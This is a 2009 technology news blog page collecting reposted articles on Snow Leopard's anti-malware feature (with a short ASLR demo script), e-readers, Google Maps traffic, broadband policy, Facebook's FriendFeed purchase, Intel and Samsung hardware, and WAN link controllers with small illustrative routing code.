Welcome to Cyber Way

A Platform to Search Knowledge, Education, Fun, and Explore Cyber World.


Thursday, August 27, 2009

Snow Leopard to Prowl for Mac Malware?



Apple has reportedly built antimalware features into its upcoming Snow Leopard operating system. The feature apparently patrols for known Mac Trojans. Tight security is an oft-touted feature of Mac OS X, though users must still be wary of malware like Mac Trojans, which have been known to exist in the wild.
Apple (Nasdaq: AAPL) has reportedly included antimalware technologies in Snow Leopard, which will go on sale Friday.
The news comes shortly after Apple released a fresh round of commercials indicating that the Mac, unlike PCs running Windows, is virus-free.
Mac security software vendor Intego's blog carried a screenshot showing the antimalware feature detecting a version of the RSPlug Trojan horse in a downloaded disk image.
Dan Goodin, writing in The Register, said the feature checks for only two known Mac Trojans and has other limitations.

About the Antimalware
Intego said it's not sure how the antimalware feature works. It promised to post more information on its blog when it finds out.
Quoting someone who has tested the feature and requested anonymity because of the restrictions of a non-disclosure agreement (NDA), Goodin said a pop-up window warns users when they try to install applications that are malicious.
The feature apparently only detects two known Mac Trojans, RSPlug and iServices. Further, it flags them only if they were downloaded from the Internet using Entourage, iChat, Safari, Mail, Firefox and Thunderbird, Goodin's source said.
The feature does not detect malicious files downloaded using Skype and other Internet-facing applications, or files on DVDs and thumb drives, Goodin's source told him.
Does Apple Security Work?
On its Web site, Apple claims that Mac OS X delivers "the highest level of security through the adoption of industry standards, open software development and wise architectural decisions." This intelligent design prevents the viruses and spyware that sometimes plague PC users, it says.
Features include secure default configuration; a personal firewall; auto updates; encryption through the FileVault feature, which uses AES-128 encryption; and disk image encryption.
However, none of that impresses Charlie Miller, principal analyst of software security at Independent Security Evaluators.
"Apple security's mostly worse than Windows Vista because it doesn't have full ASLR and DEP," he told MacNewsWorld. "We'll have to wait for Snow Leopard to see if it adds these features. If it does, it is at least comparable to Vista."
Let's Get All Technical
ASLR, or address space layout randomization, involves randomly arranging the positions of key data areas, including the base of the executable and the positions of libraries, heaps and stacks, in a process's address space. This prevents an attacker from easily predicting target addresses.
DEP, or data execution prevention, is a security feature that was introduced in Microsoft (Nasdaq: MSFT) Windows XP Service Pack 2. It prevents an application or service from executing code from a non-executable memory region, which helps block exploits that plant code in memory through a buffer overflow and then attempt to run it.
Windows XP Tablet PC Edition 2005, Windows Server 2003 SP 1, Windows Vista, Windows Server 2008, and all newer versions of Windows include DEP.
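To make the ASLR side concrete, a quick way to observe randomization is to print the address at which a shared library function is mapped and compare across runs; with ASLR enabled, the address changes every time. Here is a minimal sketch, assuming a Linux machine where the C library is exposed as "libc.so.6" (the library name and the ctypes approach are illustrative assumptions, not anything Apple or Microsoft ships):

```python
# aslr_demo.py -- run this several times and compare the output.
# With ASLR enabled, the printed address differs between runs
# because libraries are mapped at randomized base addresses.
import ctypes

# Load the C library (path assumes Linux; adjust on other platforms).
libc = ctypes.CDLL("libc.so.6")

# The address at which the printf symbol is mapped for this process.
printf_addr = ctypes.cast(libc.printf, ctypes.c_void_p).value
print(f"printf mapped at: {hex(printf_addr)}")
```

Without randomization, the address would be identical on every run, which is exactly what makes code-reuse exploits easy to aim; DEP closes the complementary hole by refusing to execute pages that are merely writable data.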
"We wonder just how serious Apple thinks the malware threat is, especially since their latest Get a Mac ads highlight the fact that PCs running Windows suffer from viruses," Intego said.
Since leaving the National Security Agency, Miller has made a career out of cracking Apple's security. At the Black Hat 2009 security conference, he demonstrated that hackers can break into iPhones through the SMS protocol. Apple later issued a patch it said fixed the problem. He also hacked a Mac in about 10 seconds at CanSecWest 2009 in Vancouver, Canada, in March.
Both Intego and Miller have seen a pre-release copy of Snow Leopard but cannot comment, because they're under NDA until Friday, when Snow Leopard hits the shelves.
Ducking the Malware Firestorm
Apple has had to issue two security updates for Leopard, Snow Leopard's predecessor, this year.
However, Cupertino has been able to avoid major security problems because it has a relatively small share of the personal computing market, said Miller.
"If 90 percent of the world runs Windows, and I'm a bad guy who wants to make money with botnets and such, I'll spend 100 percent of my time on Windows since I can make the most money that way," Miller explained.
"So far, Apple has been able to achieve excellent security by obscurity," Laura DiDio, principal at ITIC, told MacNewsWorld. "It's not that Microsoft has poor security, it's just that, if you are the largest target out there and people keep pounding on you, sooner or later they'll get through."
If the reports that Apple has included an antimalware feature in Snow Leopard are correct, it's a smart move, DiDio said.
"Besides being a good tactical move from the technology standpoint, it's a good public relations move to show industry watchers, customers and resellers Apple's taking charge, it's being proactive and not letting the issue get ahead of it," she said.

Sony Burns Kindle With New Wireless Touchscreen E-Reader


Sony has shown off its answer to Amazon's Kindle e-reader: The Daily Edition, a device that features similar wireless download capabilities but also sports a touchscreen interface. Wireless support comes from AT&T. Sony says the reader won't be ready until December, so a holiday e-book brawl may be brewing.



If you find yourself reading one of novelist Patrick O'Brian's rousing naval adventures on Sony's (NYSE: SNE) new Daily Edition electronic book reader, you will also be helping Sony send its own shot across the bow at Amazon (Nasdaq: AMZN) and its popular Kindle reading device.

Sony announced Tuesday that the Daily Edition reader will sell for US$399 and will be available in December, just in time for holiday shopping sprees. The real news, however, focused on the Daily Edition's wireless capabilities. Just as with the Kindle's Whispernet technology, the Sony device will allow for instant downloads of books no matter where the user is, thanks to back-end infrastructure provided by AT&T (NYSE: T).
The Daily Edition also offers touchscreen capabilities, which lets users highlight words and paragraphs, and will allow consumers to "check out" books from libraries nationwide thanks to a partnership with OverDrive. The latter feature helps shore up a previous weakness with Sony's reading devices compared to Amazon's Kindle -- the sheer number of books available for download.

Look, Ma, No USB Cables
"Amazon set the standard in being able to integrate wireless," Gerry Purdy, chief analyst of mobile and wireless for Frost and Sullivan, told TechNewsWorld. "It isn't that just adding wireless makes it important, but what it enables is important. It's that the bookstore goes along with you as you're out and about. Before, you had to be connected to a PC to download stuff to your Reader, but now if somebody tells you about a book or you see a book, you can download it right then and there. It's a much better user experience."
However, the pressure is on for AT&T to deliver the same kind of seamless integration with wireless book downloads that has brought Amazon's Kindle so many critical kudos. The embedded wireless/emerging products group at AT&T now has until December to deliver on that promise, Purdy said. "AT&T has a heck of a high brand value and more quality and delivery to make that happen. You'll see a lot more deals like this. I would expect you're going to find it works like Whispernet."
Purdy sees an advantage in the AT&T connection: the global nature of the carrier's GSM network. U.S. buyers who do a lot of traveling might end up doing a lot of overseas book downloading as well.


Reading at Your Fingertips
The touchscreen is another potential key differentiator for Sony's Daily Edition. "Quickly being able to highlight a word and look up a definition or synonym is a lot easier than going to a menu. There are a number of things you have to do on a Kindle to do that. Yes it works, but touch is important. If I was giving feedback to Amazon, I'd like to see touch added to their capabilities," Purdy said.
Of course, if a rumored forthcoming Apple (Nasdaq: AAPL) tablet offers color and graphics support to any electronic book-reading features, that could add a whole new chapter to the e-book competition story. Color screens may be battery hogs, but they also provide better contrast ratios for reading, Purdy said. "As soon as you add color and media, then textbooks become viable. They need color and symbols. It's not easy to publish graphics, and you can't make them move on a Kindle. The days of kids with backpacks full of books may become numbered" with a color reader on the market, he added.

Google Maps Adds Back-Road Traffic Flow Data

Google has expanded the functionality of its Maps application to provide information on traffic congestion -- or the lack of it -- on surface streets. It previously was limited to interstate highways. Since the system relies in part on data culled from GPS chips in users' phones, its accuracy in less-populated areas is questionable. Then again, a lack of data may indicate light traffic.
Google (Nasdaq: GOOG) has pushed an update to its Maps application adding traffic data on surface streets.
The data will be drawn from GPS-enabled cellphones that are actively running the mobile version of Google's map app, the company said in a blog posting Tuesday.
Although all users of Google's mobile maps service appear to have access to the traffic data, only users with GPS-equipped phones with Google Maps installed can contribute speed information. The iPhone's built-in map application does not support the crowdsourcing feature, according to Google.
The company had previously restricted traffic data to interstate routes, and at least some of that data was provided by traffic services, according to media reports.
It's unclear whether Google was using crowdsourcing to help generate its interstate reports, whether it is still using those traffic services and, if so, whether their reports play into the descriptions of side-street traffic.
Google's media relations office did not respond to a request for comment on the new service by this article's deadline.

No News Is Good News?
The updated service works by sending Google anonymous data, collected by the GPS chip in a user's cellphone, on how fast the car it's riding in is moving.
Google's service will likely run into the same sort of problem other traffic services encounter when they try to predict speeds away from the mad crush of traffic: on quiet secondary and side streets, few drivers are likely to be motoring with their cellphones open to Google Maps, said Chris Hazelton, research director for mobile and wireless at the 451 Group.
"That's when you get into samples of one or two people," Hazelton told TechNewsWorld. "How do they know if I'm parking or sitting in traffic?"
Google seems to be satisfied with how well the service is likely to work despite the potential of a small number of users, noted Carl Howe, an analyst with the Yankee Group.
"The question is how many will actually have connected cellphones with GPS applications on them running all the time," Howe told TechNewsWorld. "Google asserts, though, that there are enough that they're getting good data."
The number of cellphones equipped with GPS is large, but it's not clear exactly how many of those phones allow applications to access data from their chips. Regardless, GPS in cellphones is in big demand among consumers and will become increasingly prevalent in the coming years, said Allen Nogee, a principal at In-Stat.

More Than a Convenience
Crowdsourcing is not entirely new in traffic circles. Some private and governmental traffic services already use data sent out by cellphones as they hand off from tower to tower to calculate speeds on nearby roads.
The service could do more than help drivers get to their destinations faster, said Google Maps Product Manager Dave Barth in a company blog posting. It could, in fact, help the environment and assist governments in making transportation planning decisions.
Google says it is mindful of privacy concerns associated with the service, and it has taken steps to make sure that only anonymous data is collected and that trip information is discarded.

Tuesday, August 11, 2009

U.S. government will not get secret company Internet data

WASHINGTON (Reuters) - Telecommunications providers will not have to give the government sensitive revenue and Internet speed data for a program to map broadband use in U.S. homes and bring high-speed Internet service to more people.
The U.S. Commerce Department said on Friday that companies such as Verizon Communications Inc, Comcast Corp and AT&T Inc do not have to share how much money they make from each Internet subscriber. Nor must they say how fast their Internet connections typically run.
Instead, they will provide data by the block, usually about a dozen homes depending on the size of the block. They also will share the speed of Internet service that they advertise.
Companies do not want to share the specific data because they do not want their competitors to see it.
But failing to make it public allows the companies to advertise -- and charge for -- something that they often cannot deliver, said Joel Kelsey, a telecom policy analyst at Consumers Union, a watchdog group.
"The actual speeds delivered to particular areas simply doesn't match up," Kelsey said. "The government gave a lot and received very, very little in return."
Companies that sell Internet service advertise maximum service speeds as a way to entice customers. More speed means faster access to online entertainment and information.
Internet connections can work at slower speeds than the maximum speed advertised, especially when many subscribers are online at the same time.
The American Cable Association and other groups representing the companies opposed some of the rules before the government clarified the data policy.
"The agency's modifications will improve and expedite (the mapping) effort," ACA President Matthew Polka said.
Larry Landis, an Indiana utility regulatory commissioner and chairman of the federal-state group that will map high-speed Internet availability, praised the Commerce Department's National Telecommunications and Information Administration for being flexible.
The Commerce and Agriculture departments will award loans and grants to state and local governments, and nonprofit and for-profit companies, including telecommunications companies, to participate in the government's broadband program.
The first phase of the plan would release $4 billion of the $7.2 billion program included in President Barack Obama's economic stimulus plan. About $350 million will go to the mapping program, but the Commerce Department estimated that $240 million would be needed.
The rule changes come a day after the Federal Communications Commission launched its first workshop to gather ideas and proposals for a national broadband plan it plans to give to Congress in February.

Three top Hollywood studios bring films to Web

NEW YORK/LOS ANGELES (Reuters) - It is a dash of Hulu and a sprinkle of YouTube, features a crystal clear picture, can rewind or fast-forward at lightning speed, and doesn't require a download of any special software.
But epixHD.com, the soon-to-launch video website, will have its success dictated more by the movies, concerts and original programs it offers than the technology behind it, said the executive charged with creating and running the site.
"The critical linchpin to what we've got is that we have one-third of the box office of Hollywood," Epix Chief Digital Officer Emil Rensing said in an interview.
That comes thanks to the three parent companies of Epix: Viacom Inc's Paramount film studio, Lions Gate Entertainment Corp and MGM. In putting together Epix, the companies hope to compete with Time Warner Inc's HBO and CBS Corp's Showtime in the premium movie channel business.
But they added a twist. In addition to the premium movie channel and a video-on-demand component, the venture is building epixHD.com, a website where the studios' vast collections of full-length movies and new original programming can be streamed by any subscriber.
Rensing, a former executive with Time Warner's AOL, was hired to run the site. His aim, he said in an interview, was to make it "all about being easy to use" yet not a "dumb player" that simply acts as a projection screen for video.
So epixHD.com comes with an array of features. When watching Paramount's "Iron Man," for instance, a person will have access to the trailer, lists of facts about the superhero film, a plot synopsis, and cast list.
Because of its relationship with the studios, Rensing said epixHD.com could eventually offer more unique features.
"Let's give something to the fans that gets them really excited," said Rensing. "We're asking (the studios) for some of the weird stuff. We'd like to go to sets on tear down days, talk to the teamsters about the crazy stuff that happened."
BUILDING ITS LIBRARY
EpixHD.com is due to launch before the cable channel does in October, and will build its library of films from its parent studios in the months that follow. At the moment, it is still being tested in front of a small audience.
As for its appearance, the site features a wall of movies from which a viewer chooses with a click of the mouse. The movie then pops up, set against a traditional red movie theater curtain. Another mouse click plays the movie.
"My job is not to convince people to watch movies on the Internet. I already know they are doing that. What's my job? My job is to make it as easy and fun as possible to watch the stuff that I have access to," said Rensing.
"We're not a tech company, we're a media company," he said in response to a question about some similarities to Google Inc's YouTube or Hulu, owned by General Electric Co's NBC Universal, News Corp, and Walt Disney.
"I'm not going to reinvent the wheel. Hulu's got a great player. I'm going to take a couple things from Hulu. YouTube's got a couple cool features. I'm going to take them."

Facebook buys social media start-up FriendFeed

SAN FRANCISCO (Reuters) - Facebook, the world's largest social networking site, said it will buy FriendFeed, netting a group of prized ex-Google engineers in the fast-growing Internet business.
FriendFeed, an up-and-coming social media startup, lets people share content online in real time across various social networks and blogs.
The service is similar to, though less popular than, Twitter, the microblogging site that Facebook tried to buy for $500 million in 2008, according to sources familiar with the matter.
Terms of the deal were not disclosed on Monday, but Facebook said FriendFeed would operate as it has for the time being as the teams determine long-term plans.
Facebook's big gain in the acquisition is the engineering talent at FriendFeed, rather than the actual product, which has won critical praise, but lagged in popularity compared to Twitter, said Forrester Research analyst Jeremiah Owyang.
"These guys now how to build scalable, social applications," said Owyang.
In a statement, Facebook CEO Mark Zuckerberg said he admired the FriendFeed team for having created a service he described as simple and elegant.
"As this shows, our culture continues to make Facebook a place where the best engineers come to build things quickly that lots of people will use," said Zuckerberg.
FriendFeed's four founders are former Google Inc employees who count well known products like Gmail and Google Maps among their accomplishments.
Facebook said the founders will hold senior roles on its engineering and product teams.
FriendFeed had talked with Facebook "casually" for a couple of months, and it became clear that the teams were "cut from the same cloth," FriendFeed co-founder Bret Taylor told Reuters in an interview.
He declined to say whether FriendFeed had been in talks with other companies.
One bridge between Facebook and FriendFeed might have been Matt Cohler, Facebook's former management vice president. He joined FriendFeed backer Benchmark Capital last year.
Asked what role the connection played in the deal, FriendFeed's Taylor said the decision to be acquired by Facebook was made entirely by the team at FriendFeed.
Facebook has more than 250 million registered users. In May, the social networking company announced a $200 million investment from Russian investor Digital Sky Technologies that pegged the value of its preferred shares at $10 billion.

Tuesday, June 16, 2009

Core i7-975 Extreme Details

The Core i7 vital stats you already know apply here, just as they have since the architecture launched last year. Manufactured on Intel’s now-mature 45nm process, a single Core i7 die occupies 263 square millimeters.
Natively quad-core, meaning the processor doesn’t consist of two dual-core dies on a single multi-chip module (like Core 2 Quad), Core i7 also includes Hyper-Threading technology. The result is a micro-architecture with four physical execution cores able to work concurrently on eight threads. Thanks to the effort software developers have put into optimizing relevant code for parallelism, this results in a performance win more often now than it did when Hyper-Threading first emerged in the Pentium 4 days.
Cache sizes remain the same (32 KB L1 I/32 KB L1 D and 256 KB L2 per core, plus 8 MB shared L3), and the integrated triple-channel memory controller is still officially limited to DDR3-1066. But of course, as we’ve discovered, retail CPUs support the multipliers necessary to reach as far as DDR3-2133. We have heard from one memory vendor that the controller itself has been improved, but without any additional information from Intel regarding how it might have been tweaked, we can’t confirm those rumors at this time. We can say that DDR3-2133 is now within reach, though it takes some serious tuning to stabilize at that data rate.
As with the i7-965 Extreme, the 975 boasts a 6.4 GT/s QPI link, while the i7-950 employs a 4.8 GT/s link. Of course, if you’re running a retail processor (and not an engineering sample, like the one used in our original Core i7 launch coverage), you should be able to manually tune QPI speed up to 6.4 GT/s in your motherboard’s BIOS.

We asked Intel about the i7-975's Turbo bin configuration and were told that it is exactly the same as the i7-965 before it. That is to say, when 1, 2, 3, or 4 cores are active, you get 2, 1, 1, and 1 available bin (a bin being 133 MHz). Curious as to how much time our 975 Extreme would spend at 3.6 GHz, we ran a single thread of Prime95 to tax an individual core. Interestingly enough, you spend a lot of time waiting for that 27x multiplier to kick in (up from 25x), and it doesn't last very long. You see, there's always something else going on in the background, and if there isn't a significant load being applied to at least one thread, SpeedStep is throttling you back the other way. Expect most of your load time to be spent at 3.46 GHz with Turbo mode enabled. Otherwise, turn the feature off completely and overclock manually.
As a result, we have to wonder how much benefit upcoming architectures will see from Turbo with a single core active.
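For readers who want to check the math, the clock speeds quoted above fall straight out of multiplier arithmetic: a bin is one 133 MHz step added to the chip's base multiplier of 25. A small sketch of that calculation (the 2/1/1/1 bin table mirrors what Intel told us; the rest is plain arithmetic):

```python
BCLK = 133        # MHz -- Core i7 base clock
BASE_MULT = 25    # i7-975 base multiplier: 25 x 133 = ~3.33 GHz

# Turbo bins available per number of active cores (2/1/1/1 per Intel).
TURBO_BINS = {1: 2, 2: 1, 3: 1, 4: 1}

def turbo_freq_ghz(active_cores):
    """Effective clock with Turbo engaged for the given core count."""
    multiplier = BASE_MULT + TURBO_BINS[active_cores]
    return multiplier * BCLK / 1000.0

for cores in sorted(TURBO_BINS):
    print(f"{cores} core(s) active: {turbo_freq_ghz(cores):.2f} GHz")
# 1 core: 27 x 133 = ~3.59 GHz; 2-4 cores: 26 x 133 = ~3.46 GHz
```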

Hard Drives, Yesterday And Today: From 500 GB To 1.5 TB


Hard drives have now reached the 2,000 GB (2 TB) capacity level, and performance has been steadily going up as well. Hard drive makers have finally incorporated power consumption into their design decisions, making modern hard drives not only bigger and faster, but also more efficient when looked at either from a performance per watt or capacity per watt standpoint.
We took the last three Samsung desktop hard drive product generations and compared their top models to analyze how much progress has been made in the hard drive space.

Hard Drives Versus Solid State Drives
The most recent solid state drives, which are referred to as flash SSDs, have reached capacities of up to 256 GB, and their performance often exceeds 200 MB/s with extremely short latencies. However, only a few of them are truly worth the several-hundred-dollar investment they demand, as flash SSDs require intelligent, multi-channel configurations with smart controllers and cache memory. The cache is required to enable command queuing, in an effort to maximize wear leveling and performance under changing workloads. But we’ll stop talking about flash storage, as it is only interesting at the very high end and the very low end. Hard drives will continue to dominate the storage market for several years.
Capacities of up to 2 TB cannot yet be realized on flash memory; even if they could, such a drive would cost thousands of dollars. The cost advantage in the mainstream is even more significant: terabyte hard drives are available at only $100, while you have to spend three times as much for only 10-20% of that capacity on flash SSDs. And finally, the flash market could not even supply sufficient flash memory to meet the storage demands of today (and tomorrow).

Samsung: From 0-60 Within A Few Product Generations
Most people don’t think about Samsung when they talk about hard drives, but the Korean company has managed to become an important player next to Seagate, Hitachi, and Western Digital. The Japanese companies Fujitsu and Toshiba are still fairly active, but they mainly focus on notebook drives (both companies) and server hard drives (Fujitsu). Server drives are also a focus for Seagate and Hitachi. Samsung and WD have server offerings, but their product lines are limited.


Desktop Hard Drive Analysis
We will look at some notebook hard drives in a future article, as these HDD types will dominate the storage market in coming years, due to the shift from stationary to mobile computing. Today we’ll look at three hard drive generations by Samsung: the Spinpoint T166 at 500 GB, the Spinpoint F1 EcoGreen 1000 GB, and the Spinpoint F2 EcoGreen 1500 GB. These represent Samsung’s last three product lines, and they serve as perfect examples to pinpoint where storage is heading.

SKorea military networks under growing cyber attack

South Korea's military computer networks are under ever-growing cyber attack with 95,000 cases reported daily on average, officials said Tuesday.
The Defence Security Command said in a report to a security forum that every day the military counters an average of 10,450 hacking attempts and 81,700 computer virus infections in addition to other cases.
The attacks increased 20 percent this year compared to 2008, it said.
A spokesman for the command told AFP most of the attacks are the same as ordinary people experience at home, but one-tenth are serious.
"Eleven percent of the total are sophisticated and vicious attempts to hack into military servers and to gather intelligence," the spokesman said.
The command did not elaborate on where the attacks originated. Defence officials in Seoul have previously pointed to North Korea and China, which they say run elite hacker units.
Yoo Ho-Jin, an official of the National Intelligence Service, said his agency recently proposed that the president name an aide to deal with cyber-security.
"Our country continues to be vulnerable. Some of our government branches failed to function when we recently simulated a cyber-attack on them," Yoo told a security forum on Tuesday, according to Yonhap news agency.
"This is a grave threat to our national security."
South Korea and the United States in April agreed to cooperate to defend their defence networks from countries including China and North Korea.
Last year South Korean Prime Minister Han Seung-Soo warned his cabinet against what he called attempts by Chinese and North Korean computer hackers to obtain state secrets.

Wednesday, June 3, 2009

The WAN Traffic Controller Juggling Act

Boosting the speed of wide area network application delivery by directing traffic through multiple network paths is a little like running an airport with multiple runways. The more runways, the less congestion. However, both scenarios require someone to direct traffic. Efficient WAN directing devices put you in the control tower.
The Internet has become a critical component in today's fast-moving business environment and continues to play a central role in delivering mission-critical business applications and vital communications to employees, partners and customers. The Internet holds the promise for organizations to streamline operations, improve operational efficiencies and lower costs. As a result, businesses have come to rely on networked applications delivered over the Internet for day-to-day operations and as a means for gaining competitive advantage.
Because of the many possibilities for improving business operations, IT personnel are placing increased attention on application service delivery and the growing role that their organization's WAN (wide area network) plays within the application delivery ecosystem. The WAN is a critical component of today's business infrastructure. However, the WAN sits outside the business's direct control, in the hands of the telco or Internet service provider (ISP), an issue that every business relying on the Internet needs to address.
The high value that WANs possess is a direct result of the consolidation of the data center, the centralization of user applications, increasing mobility of employees, the need for business continuity, and the addition of IP (Internet protocol)-enabled applications such as VoIP (voice over Internet protocol) and CRM (customer relationship management).

WAN Link Controllers Give Businesses Control Over the WAN
By routing traffic over multiple service provider links, WAN link controllers create a redundant WAN architecture that provides reliable network uptime while directly impacting the performance of applications over the Internet. This improvement is enhanced by capabilities such as link load balancing and failover and the ability to shape bandwidth for specific applications. Integrated firewall, VPN (virtual private network) and denial of service (DoS) security also help to ensure that the associated reliability and performance gains do not get thwarted by security attacks.
WAN scalability and cost reductions are realized through complete freedom of choice in ISP/telco connectivity, allowing network designers and administrators to deploy a variety of cost-efficient bandwidth options such as T1, cable, wireless, DSL (digital subscriber line), etc. The simplicity of adding and removing WAN links and service providers, together with the efficient use of existing connectivity through link load-balancing and bandwidth management techniques, is what makes WAN link controllers so valuable. Additionally, these products are far more cost-effective and simpler to deploy than trying to use Border Gateway Protocol (BGP) for bi-directional link load balancing.
Multimedia and other bandwidth-hungry applications that performed well over a local area network (1 Gbps) with ample capacity are being challenged to provide the same level of performance over a T1 link (1.544 Mbps) or DSL link (500 Kbps). This is especially true when the WAN is bottlenecked, and as more applications such as streaming video and VoIP get deployed over the same WAN link. SMEs (small to medium enterprises) need a way to optimize bandwidth in order to meet traffic requirements and improve traffic flows.
Today, the majority of articles written about WAN optimization tend to focus on technologies such as caching, compression and protocol acceleration. However, even with all the compression, caching and protocol acceleration money can buy, if the WAN link that the applications are running over fails, the applications will not get delivered -- period. In today's dynamic business environment, IT personnel need to have a network infrastructure that is redundant, flexible, scalable and can apply appropriate levels of bandwidth to specific applications running over the WAN.
Boosting the speed of WAN application delivery by directing traffic through multiple network paths is surprisingly straightforward. To extend the airport analogy, adding a second runway can significantly improve traffic flow when disruptions such as airplane breakdowns, congestion and poor weather strike. Similarly, the effectiveness of the multiple-path approach for WAN connectivity depends greatly on the traffic-directing devices (i.e., WAN link controllers) and their ability to efficiently and accurately detect network congestion, make routing decisions to circumvent bottlenecks and prioritize applications with bandwidth guarantees. This needs to be accomplished in a manner that is relevant to the specific type of traffic payload being routed. For example, with VoIP traffic, a high-latency network path should be avoided; for large file transfers, a low-bandwidth path should be avoided.
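That payload-aware routing decision reduces, at its core, to filtering healthy links and ranking them by the metric the traffic cares about. The sketch below is a simplified model under stated assumptions; the link names, metrics and thresholds are invented for illustration, and real controllers use much richer health checks:

```python
# Measured state of each WAN link (values invented for illustration).
links = {
    "T1":    {"latency_ms": 20,  "free_kbps": 900,  "up": True},
    "DSL":   {"latency_ms": 45,  "free_kbps": 3000, "up": True},
    "Cable": {"latency_ms": 120, "free_kbps": 6000, "up": True},
}

def pick_link(traffic_type):
    """Choose an available link suited to the traffic's sensitivity."""
    live = {name: l for name, l in links.items() if l["up"]}
    if traffic_type == "voip":
        # Latency-sensitive: steer clear of high-latency paths.
        return min(live, key=lambda n: live[n]["latency_ms"])
    if traffic_type == "file_transfer":
        # Throughput-sensitive: steer clear of low-bandwidth paths.
        return max(live, key=lambda n: live[n]["free_kbps"])
    # Default policy: send everything else to the least-loaded link.
    return max(live, key=lambda n: live[n]["free_kbps"])

print(pick_link("voip"))           # -> T1 (lowest latency)
print(pick_link("file_transfer"))  # -> Cable (most free bandwidth)
```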
QoS Prioritizes WAN Connection Bandwidth for Mission-Critical Applications
Many WAN link controllers include the ability to manage applications over the WAN using traffic shaping and quality of service rules, allowing administrators to define traffic and application limits and enable application queuing to prioritize different traffic types. This allows greater control of available bandwidth so that high-priority applications such as VoIP are allocated the bandwidth they require for optimal delivery over the WAN. Bandwidth usage can be managed based upon business policies that are associated with specific mission-critical applications in order to avoid bandwidth contention.
In the first example, an Internet-based business has two ISP connections using BGP for high availability. Its primary applications are VoIP and email. The applications run smoothly when the primary ISP connection is available. However, when that connection fails, the second ISP connection handles all the traffic, and the VoIP application utilizes most of the available bandwidth, depriving the email application of bandwidth. This causes a business disruption, as a significant amount of the company's business is conducted via email, which dramatically impacts productivity and business communication.

In the second example below, the WAN link controller uses QoS to prioritize the VoIP and email applications when the ISP connection is restored. By dedicating bandwidth for each application, the WAN link controller ensures that the applications will have bandwidth allotted to them, enabling each to have the bandwidth they need for optimal service delivery.
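In code terms, that per-application guarantee amounts to reserving a bandwidth floor for each application and letting whatever is left be shared. A minimal sketch, with the link capacity and reservation numbers invented for the example:

```python
LINK_KBPS = 1544  # the single surviving T1 after the primary ISP fails

# Guaranteed floors per application, set by business policy (invented).
FLOORS = {"voip": 768, "email": 512}

def allocate(demands):
    """Grant each app up to its floor, then share leftover capacity."""
    alloc = {app: min(demands.get(app, 0), floor)
             for app, floor in FLOORS.items()}
    leftover = LINK_KBPS - sum(alloc.values())
    for app, demand in demands.items():
        extra = min(demand - alloc.get(app, 0), leftover)
        if extra > 0:
            alloc[app] = alloc.get(app, 0) + extra
            leftover -= extra
    return alloc

# VoIP tries to grab the whole pipe, yet email keeps its reserved share.
print(allocate({"voip": 1544, "email": 400}))
# -> {'voip': 1144, 'email': 400}
```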
WAN Link Controllers Put You in Control
By moving intelligent switching functionality to the edge of an enterprise network, WAN link controllers provide administrators with a new level of control. Administrators can dynamically direct traffic based on service provider availability, line capacity, performance and other policies.
WAN link controllers are deployed in-line between gateway routers and firewalls. To monitor WAN connectivity status, they perform transparent health and performance checks to evaluate the quality and reliability for each ISP link. Using this information, the WAN link controller intercepts traffic flowing in and out of the LAN and automatically switches users to the optimal WAN links.
Where traffic is sent is determined via advanced algorithms that take into account elements such as bandwidth utilization and other criteria, including what an organization pays for each ISP link. Administrators can set these policies to define how traffic should be directed to service provider links in order to best leverage their bandwidth investments. The WAN link controller prioritizes traffic to achieve optimal application delivery. For example, the IT department can decide whether to prevent (or limit) the download of YouTube content and other non-business-related Internet browsing on the WAN during business hours, or it can set higher bandwidth priorities for mission-critical applications such as VoIP.
As applications such as VoIP continue to grow, the need to optimize and efficiently manage them over WAN networks becomes critical. To that end, the WAN link controller allows administrators to optimize VoIP transmission by routing VoIP traffic based on IP address, traffic type, user address, etc. For example, all VoIP traffic can be allocated to a single line, with a second line allocated to aggregate the combined bandwidth in order to accommodate the traffic load.

Microsoft at E3: Look, Nintendo, No Controllers!


Microsoft wowed the E3 video game convention with a demonstration of Project Natal, a motion-sensing Xbox technology in development. With Nintendo's popular Wii, players use a handheld wand; however, Natal uses cameras to sense a player's full body movements. Despite the riveting demo, Natal is still unproven in terms of its actual gaming performance, and release timing is up in the air.

Microsoft is controlling the early buzz at the massive E3 video game convention with its Project Natal technology, which allows gamers to interact with their Xbox 360s without the need for handheld controllers.
Along with the publicity, though, the company is creating a lot of questions regarding its ability to deliver on the innovation and promise demonstrated on a Los Angeles Convention Center stage Monday.

It made sense for Microsoft to invite Steven Spielberg to help introduce Natal to the throng of media and industry insiders in the audience. Natal uses a full-body motion capture camera along with voice and facial recognition technology to let users do their best impressions of Tom Cruise's character from Spielberg's 2002 science fiction opus "Minority Report." Like Cruise, Natal players will use their movements and their voices to interact with games and, as Spielberg hinted, possibly other forms of entertainment.
Natal demonstration videos now on the Web feature a family member pretending to hold a race car's steering wheel from her living room couch while zooming along a Formula One course in a game; another gets martial arts lessons from an in-game teacher who follows a teenage boy's movements as he paces the floor; that boy's little brother later controls a Godzilla-like monster on the screen. The parents are seen using hand gestures to pick their movie choices from an Xbox Live catalog.

The Big Questions
All of this is the stuff that gamers' and early adopters' dreams are made of, naturally. So when can you buy it? How much will it cost? Will the games featured in the demonstration be available?
Microsoft had no answers to any of these questions, but there are plenty of unofficial efforts to fill in the blanks. Microsoft executives did say that the software development kit for Natal is now available for third-party game developers.
Given the long lead time required to bring games to market, it's unlikely that Redmond will be giving a Christmas present to the gaming industry this year, said Directions on Microsoft vice president Matt Rosoff. A pre-holiday release "could be interesting and could spur game sales and keep console sales strong," Rosoff told TechNewsWorld, "but if it waits another year, we'll have to see if the buzz dies down."
If Natal were to come out before the end of 2009, the games available would all have to be from Microsoft studios, Rosoff speculated, as third-party developers would need more time to build games based on the new technology -- and Microsoft would want a lot of consumer choices available at launch.
Demo Is One Thing, but What About the Living Room?
Natal looked great in the E3 demonstration and on the video presentations, Rosoff acknowledged, "but of course, we're going to have to see how it works in the real-world environment. They are camera-based sensors, so light and the amount of light in your room might be an issue. It's just one of those products that until you start to see some hands-on reviews, it's going to be hard to know whether it works as advertised."
Natal is a good answer to the Wii-mote, which has helped Nintendo vault back to the top of the video game industry, said Rosoff. However, Xbox has come a long way from the 2001 introduction of its original console, and now its 360 version has reached a solid No. 2 position in terms of sales, ahead of former leader Sony (NYSE: SNE) and its PlayStation 3.
"I think all three companies want to keep this generation of consoles around for a while, so there should be no new consoles or arms race. The competition will be in services and peripherals," Rosoff predicted.

Tuesday, May 26, 2009

Inside Dell's command center

If there’s a hurricane forming in the Caribbean, a major freeway closure in Los Angeles or flight delays out of Chicago, chances are that Jason Allen knows about it.

